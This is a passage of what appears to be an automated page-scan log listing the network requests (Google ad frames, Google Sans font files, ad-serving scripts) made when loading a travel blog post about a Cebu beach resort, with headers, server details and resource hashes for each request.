expires: Tue, 29 Mar 2022 11:03:22 GMT

GET
DATA 200
OK truncated
/ Frame 28C6 209 B
0 Image
image/svg+xml

General

Check archive.org

Show headers Download Go to Show image

Full URL: data:truncated
Protocol: DATA
Server: -, , ASN (),
Reverse DNS
Software: /
Resource Hash: d7779d95203bed5280ee3281f856607f95ac5df680547356656c7109d7d0a6a6

Request headers

Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

Content-Type: image/svg+xml

GET
H3-Q050 200 adview
googleads.g.doubleclick.net/pagead/ Frame 3ACD 0
0 16ms
16ms Fetch
text/html 2a00:1450:4001:82a::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://googleads.g.doubleclick.net/pagead/adview?ai=CnsQWSYtmYIqRO_2v7_UPxe2z0Aqlx8qTYZLBrYnTDMCNtwEQASDFz58TYJWKuILIB6AByP_n0wHIAQmpAiddEgGJNrc-qAMByAPLBKoEmAJP0B1n527IvOwGubQA-qtTTs9eYUz0wtZAJMsqSNWbaV_3HVW5MkC_X5YfATMjNIobGWZ4LmCOsfkB0zjuVi47IKzLL93DIkpNwLBf-zTOKIZvzi4ANsg22riMUAmo97g6hiz4fJCFay3r2F5nxzUxi61ia2VDFcln9meq4LuhQGbFbvCXi1QePNOXL--OBYyCgCqIFlrUixdVhzHqY9zndz0isJzhtNL3znxktf4tbppZvPptlyT3ycHWjlR4DdOu6Cl8JIexigyVyxgVrpJG47O-2KJmpgx7Wd4zNaqhzZR4RHmPjaPEJi6UjPXjTdJJeKzFKDaeCcqc-P85v17S4Ea4hx1c8OsZV5qJlCj8cCbR5rFIdD5mwAS8zYqzvgOSBQQIBBgBkgUECAUYBKAGLoAHoICYrAKoB9XJG6gH8NkbqAfy2RuoB47OG6gHk9gbqAe6BqgH7paxAqgHpr4bqAfs1RvYBwDyBwQQ1MEw0ggJCIDhgBAQARgfgAoByAsB2BMKshcaChgIABIUcHViLTY3NjE2MTE4ODAzNTEwNTM&sigh=xY7qr976VOU&template_id=5000&tpd=AGWhJmtoDICo8tNfNyZo_rHTBaV5zRNZitv2mlpYoxPCOj8anA

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:82a::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

Security Headers

Name	Value
Content-Security-Policy	script-src 'none'; object-src 'none'
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=2262990825&adk=3733099233&adf=398161349&pi=t.ma~as.2262990825&w=825&fwrn=4&fwrnh=100&lmt=1617333065&rafmt=1&psa=0&format=825x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065745&bpp=57&bdt=244&idt=166&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&prev_fmts=0x0&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=245&ady=1352&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=2&uci=a!2&btvi=1&fsb=1&xpc=G2vAqXg6pL&p=https%3A//www.itravelrox.com&dtd=207
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

timing-allow-origin: *
content-security-policy: script-src 'none'; object-src 'none'
x-content-type-options: nosniff
server: cafe
date: Fri, 02 Apr 2021 03:11:06 GMT
p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
cross-origin-resource-policy: cross-origin
content-type: text/html; charset=UTF-8
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 0
x-xss-protection: 0

GET
DATA 200
OK truncated
/ Frame 28C6 213 B
0 Image
image/png

General

Check archive.org

Show headers Download Go to Show image

Full URL: data:truncated
Protocol: DATA
Server: -, , ASN (),
Reverse DNS
Software: /
Resource Hash: f8ef7a2525501221409e1354a671dde527981daf02c973b3442290483ecddd87

Request headers

Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

Content-Type: image/png

GET
DATA 200
OK truncated
/ Frame 3ACD 214 B
0 Image
image/png

General

Check archive.org

Show headers Download Go to Show image

Full URL: data:truncated
Protocol: DATA
Server: -, , ASN (),
Reverse DNS
Software: /
Resource Hash: 3df21879a809a39341668e25e2a31a58451d15fb83fe3268c8f2b9b511e280cd

Request headers

Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

Content-Type: image/png

GET
H3-Q050 200 4UabrENHsxJlGDuGo1OIlLU94YtzCwY.woff2
fonts.gstatic.com/s/googlesans/v27/ Frame 3ACD 21 KB
21 KB 7ms
7ms Font
font/woff2 2a00:1450:4001:80f::2003
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://fonts.gstatic.com/s/googlesans/v27/4UabrENHsxJlGDuGo1OIlLU94YtzCwY.woff2

Requested by

Host: fonts.googleapis.com
URL: https://fonts.googleapis.com/css?family=Google%20Sans%3A400%2C500

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:80f::2003 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

f2c761ee3ce27469f940a05b64e38a829a400427727cd0bdbb4e36f1d572afd7

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Origin: https://googleads.g.doubleclick.net
Referer: https://fonts.googleapis.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Thu, 01 Apr 2021 01:58:20 GMT
x-content-type-options: nosniff
last-modified: Wed, 11 Nov 2020 20:26:21 GMT
server: sffe
age: 90766
content-type: font/woff2
access-control-allow-origin: *
cache-control: public, max-age=31536000
accept-ranges: bytes
timing-allow-origin: *
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 21716
x-xss-protection: 0
expires: Fri, 01 Apr 2022 01:58:20 GMT

GET
H3-Q050 200 4UaGrENHsxJlGDuGo1OIlL3Owp4.woff2
fonts.gstatic.com/s/googlesans/v27/ Frame 3ACD 21 KB
21 KB 8ms
8ms Font
font/woff2 2a00:1450:4001:80f::2003
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://fonts.gstatic.com/s/googlesans/v27/4UaGrENHsxJlGDuGo1OIlL3Owp4.woff2

Requested by

Host: fonts.googleapis.com
URL: https://fonts.googleapis.com/css?family=Google%20Sans%3A400%2C500

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:80f::2003 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

1cf04407e728ea1ebf82dc1c6b45d12632cb3202ff8f4556f380b16e57484f27

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Origin: https://googleads.g.doubleclick.net
Referer: https://fonts.googleapis.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Wed, 31 Mar 2021 21:42:23 GMT
x-content-type-options: nosniff
last-modified: Wed, 11 Nov 2020 20:26:16 GMT
server: sffe
age: 106123
content-type: font/woff2
access-control-allow-origin: *
cache-control: public, max-age=31536000
accept-ranges: bytes
timing-allow-origin: *
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 21552
x-xss-protection: 0
expires: Thu, 31 Mar 2022 21:42:23 GMT

GET
H3-Q050 200 4UabrENHsxJlGDuGo1OIlLU94YtzCwY.woff2
fonts.gstatic.com/s/googlesans/v27/ Frame 28C6 21 KB
21 KB 6ms
6ms Font
font/woff2 2a00:1450:4001:80f::2003
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://fonts.gstatic.com/s/googlesans/v27/4UabrENHsxJlGDuGo1OIlLU94YtzCwY.woff2

Requested by

Host: fonts.googleapis.com
URL: https://fonts.googleapis.com/css?family=Google%20Sans%3A400%2C500

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:80f::2003 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

f2c761ee3ce27469f940a05b64e38a829a400427727cd0bdbb4e36f1d572afd7

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Origin: https://googleads.g.doubleclick.net
Referer: https://fonts.googleapis.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Thu, 01 Apr 2021 01:58:20 GMT
x-content-type-options: nosniff
last-modified: Wed, 11 Nov 2020 20:26:21 GMT
server: sffe
age: 90766
content-type: font/woff2
access-control-allow-origin: *
cache-control: public, max-age=31536000
accept-ranges: bytes
timing-allow-origin: *
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 21716
x-xss-protection: 0
expires: Fri, 01 Apr 2022 01:58:20 GMT

GET
H3-Q050 200 4UaGrENHsxJlGDuGo1OIlL3Owp4.woff2
fonts.gstatic.com/s/googlesans/v27/ Frame 28C6 21 KB
21 KB 6ms
6ms Font
font/woff2 2a00:1450:4001:80f::2003
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://fonts.gstatic.com/s/googlesans/v27/4UaGrENHsxJlGDuGo1OIlL3Owp4.woff2

Requested by

Host: fonts.googleapis.com
URL: https://fonts.googleapis.com/css?family=Google%20Sans%3A400%2C500

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:80f::2003 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

1cf04407e728ea1ebf82dc1c6b45d12632cb3202ff8f4556f380b16e57484f27

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Origin: https://googleads.g.doubleclick.net
Referer: https://fonts.googleapis.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Wed, 31 Mar 2021 21:42:23 GMT
x-content-type-options: nosniff
last-modified: Wed, 11 Nov 2020 20:26:16 GMT
server: sffe
age: 106123
content-type: font/woff2
access-control-allow-origin: *
cache-control: public, max-age=31536000
accept-ranges: bytes
timing-allow-origin: *
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 21552
x-xss-protection: 0
expires: Thu, 31 Mar 2022 21:42:23 GMT

GET
H3-Q050 200 css
fonts.googleapis.com/ Frame AF47 3 KB
600 B 14ms
14ms Stylesheet
text/css 2a00:1450:4001:828::200a
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://fonts.googleapis.com/css?family=Google%20Sans%3A400%2C500

Requested by

Host: googleads.g.doubleclick.net
URL: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=2262990825&adk=3733099233&adf=2452791592&pi=t.ma~as.2262990825&w=825&fwrn=4&fwrnh=100&lmt=1617333066&rafmt=1&psa=0&format=825x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065805&bpp=1&bdt=305&idt=219&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=245&ady=3468&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=5&uci=a!5&btvi=3&fsb=1&xpc=LK9BJI43vo&p=https%3A//www.itravelrox.com&dtd=224

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::200a Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

ESF /

Resource Hash

599325d39743959cdacb163b742dd6f622443a73f155364bbcc465a291ce0b5a

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

strict-transport-security: max-age=31536000
content-encoding: gzip
x-content-type-options: nosniff
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
x-xss-protection: 0
last-modified: Fri, 02 Apr 2021 01:19:37 GMT
server: ESF
date: Fri, 02 Apr 2021 03:11:06 GMT
x-frame-options: SAMEORIGIN
content-type: text/css; charset=utf-8
access-control-allow-origin: *
cache-control: private, max-age=86400, stale-while-revalidate=604800
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
expires: Fri, 02 Apr 2021 03:11:06 GMT

GET
H3-Q050 200 load_preloaded_resource_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/ Frame AF47 1 KB
1 KB 6ms
6ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/load_preloaded_resource_fy2019.js

Requested by

Host: googleads.g.doubleclick.net
URL: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=2262990825&adk=3733099233&adf=2452791592&pi=t.ma~as.2262990825&w=825&fwrn=4&fwrnh=100&lmt=1617333066&rafmt=1&psa=0&format=825x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065805&bpp=1&bdt=305&idt=219&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=245&ady=3468&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=5&uci=a!5&btvi=3&fsb=1&xpc=LK9BJI43vo&p=https%3A//www.itravelrox.com&dtd=224

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

49aea8d1206dbb5e3c8a7d4db9274d2efa2111d8b53acb901efc378b1feca381

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 01:28:39 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 6147
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 882
x-xss-protection: 0
server: cafe
etag: 11243716317595354070
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Fri, 16 Apr 2021 01:28:39 GMT

GET
H3-Q050 200 abg_lite_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/ Frame AF47 17 KB
7 KB 6ms
6ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/abg_lite_fy2019.js

Requested by

Host: googleads.g.doubleclick.net
URL: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=2262990825&adk=3733099233&adf=2452791592&pi=t.ma~as.2262990825&w=825&fwrn=4&fwrnh=100&lmt=1617333066&rafmt=1&psa=0&format=825x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065805&bpp=1&bdt=305&idt=219&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=245&ady=3468&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=5&uci=a!5&btvi=3&fsb=1&xpc=LK9BJI43vo&p=https%3A//www.itravelrox.com&dtd=224

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

b4e10c54a966ed5abeeac2aca4cfa968f317497770f59ec94af6d712db96e7d8

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:02:33 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 513
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 7115
x-xss-protection: 0
server: cafe
etag: 8094203328658613728
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Fri, 16 Apr 2021 03:02:33 GMT

GET
H3-Q050 200 window_focus_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/ Frame AF47 2 KB
1 KB 6ms
6ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/window_focus_fy2019.js

Requested by

Host: googleads.g.doubleclick.net
URL: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=2262990825&adk=3733099233&adf=2452791592&pi=t.ma~as.2262990825&w=825&fwrn=4&fwrnh=100&lmt=1617333066&rafmt=1&psa=0&format=825x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065805&bpp=1&bdt=305&idt=219&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=245&ady=3468&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=5&uci=a!5&btvi=3&fsb=1&xpc=LK9BJI43vo&p=https%3A//www.itravelrox.com&dtd=224

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

731d7bd9ce2c95bf6af3d5719b995d714111949fb37b39919d45828875361233

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:01:36 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 570
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 1303
x-xss-protection: 0
server: cafe
etag: 14729628269804859526
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Fri, 16 Apr 2021 03:01:36 GMT

GET
H3-Q050 200 rx_lidar.js Show response
www.googletagservices.com/activeview/js/current/ Frame AF47 118 KB
36 KB 14ms
13ms Script
text/javascript 2a00:1450:4001:813::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914

Requested by

Host: googleads.g.doubleclick.net
URL: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=2262990825&adk=3733099233&adf=2452791592&pi=t.ma~as.2262990825&w=825&fwrn=4&fwrnh=100&lmt=1617333066&rafmt=1&psa=0&format=825x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065805&bpp=1&bdt=305&idt=219&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=245&ady=3468&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=5&uci=a!5&btvi=3&fsb=1&xpc=LK9BJI43vo&p=https%3A//www.itravelrox.com&dtd=224

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:813::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

sffe /

Resource Hash

8727cf8bd32a94a8d93d7c75469184dada14c6cadf02178c17db5ee06f832b0f

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:06 GMT
content-encoding: gzip
x-content-type-options: nosniff
server: sffe
etag: "1617218245166195"
vary: Accept-Encoding
content-type: text/javascript
cache-control: private, max-age=3000
accept-ranges: bytes
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 36656
x-xss-protection: 0
expires: Fri, 02 Apr 2021 03:11:06 GMT

GET
H3-Q050 200 qs_click_protection_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/ Frame AF47 13 KB
5 KB 7ms
6ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

